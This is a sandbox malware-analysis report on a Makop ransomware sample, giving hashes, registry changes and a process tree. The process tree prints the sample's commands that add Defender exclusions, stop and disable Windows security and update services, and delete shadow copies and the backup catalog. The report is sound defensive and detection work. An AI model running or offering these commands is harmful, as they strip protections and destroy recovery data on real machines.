Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 136s
max time network: 161s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21/09/2022, 04:04
Static task: static1
Behavioral task: behavioral1
  Sample: HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
  Resource: win7-20220812-en
Behavioral task: behavioral2
  Sample: HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
  Resource: win10v2004-20220812-en
General
Target: HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
Size: 1.9MB
MD5: 40ec0e62856036983be04f31ce670fb9
SHA1: 0d04b8139fe71a1736a8168fbf072df61d7d7bd6
SHA256: 48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521
SHA512: 1094d49d3fcb757fe2d1c49d1e441ab086f4cff80ffd8572b0017546350838dcba83f102796009d811a360f6825928c13e3697b7dd462627bb83fb92534fc806
SSDEEP: 192:z/TeYoeb67sc8+otH8SESePujd2kTCMZehZtzMuuQzBLerxA/GWeGMEd022XbTFi:z/yYoebe5JotHESxjuM63KI
Malware Config
Extracted
Path: C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\readme-warning.txt
Family: makop
Signatures
Makop
Ransomware family discovered by @VK_Intel in early 2020.

Modifies Windows Defender Real-time Protection settings
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
Suspicious use of NtCreateUserProcessOtherParentProcess (3 IoCs)
description | pid | Process | procid_target
PID 4676 created 320 | 4676 | svchost.exe | 90
PID 4676 created 4192 | 4676 | svchost.exe | 97
PID 4676 created 4192 | 4676 | svchost.exe | 97
Turns off Windows Defender SpyNet reporting (2 TTPs)

description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe = "0" | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Nirsoft (4 IoCs)
resource | yara_rule
behavioral2/files/0x0006000000022e64-136.dat | Nirsoft
behavioral2/files/0x0006000000022e64-137.dat | Nirsoft
behavioral2/files/0x0006000000022e64-139.dat | Nirsoft
behavioral2/files/0x0006000000022e6a-166.dat | Nirsoft

pid | Process
2044 | wbadmin.exe
Executes dropped EXE (3 IoCs)
pid | Process
2736 | AdvancedRun.exe
3124 | AdvancedRun.exe
4192 | AdvancedRun.exe
Stops running service(s) (3 TTPs)
Checks computer location settings (2 TTPs, 3 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | AdvancedRun.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe

description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe = "0" | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
Suspicious use of SetThreadContext (2 IoCs)
description | pid | Process | procid_target
PID 3972 set thread context of 320 | 3972 | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe | 90
PID 5068 set thread context of 2736 | 5068 | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe | 132
Drops file in Program Files directory 64 IoCs
Launches sc.exe (22 IoCs)
sc.exe is a Windows utility to control services on the system.
pid | Process
sc.exe launched with PIDs 1860, 3228, 5048, 3936, 1220, 2752, 3096, 1260, 3196, 3192, 728, 4200, 3888, 4544, 1016, 3620, 2340, 612, 3528, 2800, 1724, 4720
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Checks SCSI registry key(s) (3 TTPs, 4 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | vds.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | vds.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | vds.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | vds.exe
Interacts with shadow copies (2 TTPs, 1 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
1476 | vssadmin.exe
Suspicious behavior: EnumeratesProcesses (18 IoCs)
pid | Process (occurrences)
2736 | AdvancedRun.exe (x4)
3124 | AdvancedRun.exe (x4)
2004 | powershell.exe (x2)
4192 | AdvancedRun.exe (x4)
320 | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe (x2)
4556 | powershell.exe (x2)
Suspicious use of AdjustPrivilegeToken (58 IoCs)
pid | Process | Tokens
2736 | AdvancedRun.exe | SeDebugPrivilege, SeImpersonatePrivilege
3124 | AdvancedRun.exe | SeDebugPrivilege, SeImpersonatePrivilege
2004 | powershell.exe | SeDebugPrivilege
4676 | svchost.exe | SeTcbPrivilege (x2)
4192 | AdvancedRun.exe | SeDebugPrivilege, SeImpersonatePrivilege
4108 | vssvc.exe | SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
892 | wbengine.exe | SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege
3436 | WMIC.exe | the following sequence, recorded twice: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
4556 | powershell.exe | SeDebugPrivilege
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target | occurrences
PID 3972 wrote to memory of 2736 | 3972 | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe | 80 | x3
PID 2736 wrote to memory of 3124 | 2736 | AdvancedRun.exe | 81 | x3
PID 3972 wrote to memory of 2004 | 3972 | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe | 86 | x3
PID 3972 wrote to memory of 320 | 3972 | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe | 90 | x9
PID 4676 wrote to memory of 5068 | 4676 | svchost.exe | 93 | x7
PID 320 wrote to memory of 1828 | 320 | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe | 94 | x2
PID 1828 wrote to memory of 1476 | 1828 | cmd.exe | 96 | x2
PID 5068 wrote to memory of 4192 | 5068 | HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe | 97 | x3
PID 4676 wrote to memory of 3440 | 4676 | svchost.exe | 99 | x2
PID 3440 wrote to memory of 4720 | 3440 | cmd.exe | 102 | x2
PID 3440 wrote to memory of 2340 | 3440 | cmd.exe | 103 | x2
PID 3440 wrote to memory of 1260 | 3440 | cmd.exe | 104 | x2
PID 3440 wrote to memory of 612 | 3440 | cmd.exe | 105 | x2
PID 3440 wrote to memory of 3620 | 3440 | cmd.exe | 106 | x2
PID 3440 wrote to memory of 3196 | 3440 | cmd.exe | 107 | x2
PID 3440 wrote to memory of 3528 | 3440 | cmd.exe | 108 | x2
PID 3440 wrote to memory of 3936 | 3440 | cmd.exe | 110 | x2
PID 1828 wrote to memory of 2044 | 1828 | cmd.exe | 109 | x2
PID 3440 wrote to memory of 1220 | 3440 | cmd.exe | 111 | x2
PID 3440 wrote to memory of 3192 | 3440 | cmd.exe | 113 | x2
PID 3440 wrote to memory of 2800 | 3440 | cmd.exe | 114 | x2
PID 3440 wrote to memory of 1860 | 3440 | cmd.exe | 115 | x2
PID 3440 wrote to memory of 2752 | 3440 | cmd.exe | 116 | x2
PID 3440 wrote to memory of 728 | 3440 | cmd.exe | 118 | x2
Processes

PID 3972: C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe"
  - Modifies Windows Defender Real-time Protection settings
  - Windows security bypass
  - Checks computer location settings
  - Windows security modification
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID 2736: C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\AdvancedRun.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID 3124: C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\AdvancedRun.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\AdvancedRun.exe" /SpecialRun 4101d8 2736
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  PID 2004: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe" -Force
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  PID 320: C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe"
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID 5068: C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe" n320
      - Checks computer location settings
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory
      PID 4192: C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\AdvancedRun.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID 3440: C:\Windows\system32\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\test.bat"
          - Suspicious use of WriteProcessMemory
          PID 4720: C:\Windows\system32\sc.exe
            Command line: sc stop windefend
            - Launches sc.exe
          PID 2340: C:\Windows\system32\sc.exe
            Command line: sc config windefend start= disabled
            - Launches sc.exe
          PID 1260: C:\Windows\system32\sc.exe
            Command line: sc stop Sense
            - Launches sc.exe
          PID 612: C:\Windows\system32\sc.exe
            Command line: sc config Sense start= disabled
            - Launches sc.exe
          PID 3620: C:\Windows\system32\sc.exe
            Command line: sc stop wuauserv
            - Launches sc.exe
          PID 3196: C:\Windows\system32\sc.exe
            Command line: sc config wuauserv start= disabled
            - Launches sc.exe
          PID 3528: C:\Windows\system32\sc.exe
            Command line: sc stop usosvc
            - Launches sc.exe
          PID 3936: C:\Windows\system32\sc.exe
            Command line: sc config usosvc start= disabled
            - Launches sc.exe
          PID 1220: C:\Windows\system32\sc.exe
            Command line: sc stop WaasMedicSvc
            - Launches sc.exe
          PID 3192: C:\Windows\system32\sc.exe
            Command line: sc config WaasMedicSvc start= disabled
            - Launches sc.exe
          PID 2800: C:\Windows\system32\sc.exe
            Command line: sc stop SecurityHealthService
            - Launches sc.exe
          PID 1860: C:\Windows\system32\sc.exe
            Command line: sc config SecurityHealthService start= disabled
            - Launches sc.exe
          PID 2752: C:\Windows\system32\sc.exe
            Command line: sc stop SDRSVC
            - Launches sc.exe
          PID 728: C:\Windows\system32\sc.exe
            Command line: sc config SDRSVC start= disabled
            - Launches sc.exe
          PID 4200: C:\Windows\system32\sc.exe
            Command line: sc stop wscsvc
            - Launches sc.exe
          PID 3228: C:\Windows\system32\sc.exe
            Command line: sc config wscsvc start= disabled
            - Launches sc.exe
          PID 3096: C:\Windows\system32\sc.exe
            Command line: sc stop WdiServiceHost
            - Launches sc.exe
          PID 3888: C:\Windows\system32\sc.exe
            Command line: sc config WdiServiceHost start= disabled
            - Launches sc.exe
          PID 4544: C:\Windows\system32\sc.exe
            Command line: sc stop WdiSystemHost
            - Launches sc.exe
          PID 1016: C:\Windows\system32\sc.exe
            Command line: sc config WdiSystemHost start= disabled
            - Launches sc.exe
          PID 1724: C:\Windows\system32\sc.exe
            Command line: sc stop InstallService
            - Launches sc.exe
          PID 5048: C:\Windows\system32\sc.exe
            Command line: sc config InstallService Start= disabled
            - Launches sc.exe
      PID 4556: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe" -Force
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      PID 2736: C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe"
    PID 1828: C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe"
      - Suspicious use of WriteProcessMemory
      PID 1476: C:\Windows\system32\vssadmin.exe
        Command line: vssadmin delete shadows /all /quiet
        - Interacts with shadow copies
      PID 2044: C:\Windows\system32\wbadmin.exe
        Command line: wbadmin delete catalog -quiet
        - Deletes backup catalog
      PID 3436: C:\Windows\System32\Wbem\WMIC.exe
        Command line: wmic shadowcopy delete
        - Suspicious use of AdjustPrivilegeToken

PID 4676: C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

PID 4108: C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken

PID 892: C:\Windows\system32\wbengine.exe
  Command line: "C:\Windows\system32\wbengine.exe"
  - Suspicious use of AdjustPrivilegeToken

PID 2092: C:\Windows\System32\vdsldr.exe
  Command line: C:\Windows\System32\vdsldr.exe -Embedding

PID 4668: C:\Windows\System32\vds.exe
  Command line: C:\Windows\System32\vds.exe
  - Checks SCSI registry key(s)
Network
MITRE ATT&CK Enterprise v6
Downloads
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe.log
  Filesize: 1KB
  MD5: c8ba28b4adef1e31506663447c4fb877
  SHA1: ab07929915ab927500c2fb32757f0512a0fa050e
  SHA256: 589ddf313adbbe748a1d83d08ff4ec49b7cc6d6ca9d756ae38a779efe331add2
  SHA512: 1778691f90f45240ba9460f0eb06c8ab72f845f2b841fdfdeb0da3e8c4e293fb11f40c858369cb7c8f5ea5fe45891b8cf1c968849fc3ce2251f517e0c519906d
C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\test.bat.[9C4C1438].[[email protected]].makop
  Filesize: 8KB
  MD5: 263655b1a06d30281358b83adfea8d4e
  SHA1: e070e79d63fce882d648d1af15c8e4247fc25a0f
  SHA256: 145547d6f2dfed7e74bc8abf7c16b1858a9f1d6a6b78817e56d6fae027c4d15d
  SHA512: 867e39e8c7f9bc8a9395c41db013d4648169239fef42db8e0cffe6df2cd6cb8dfc09b039473ab35ad8ddafcf3364f66dcc9b28c6c1d2a931300b221d30088048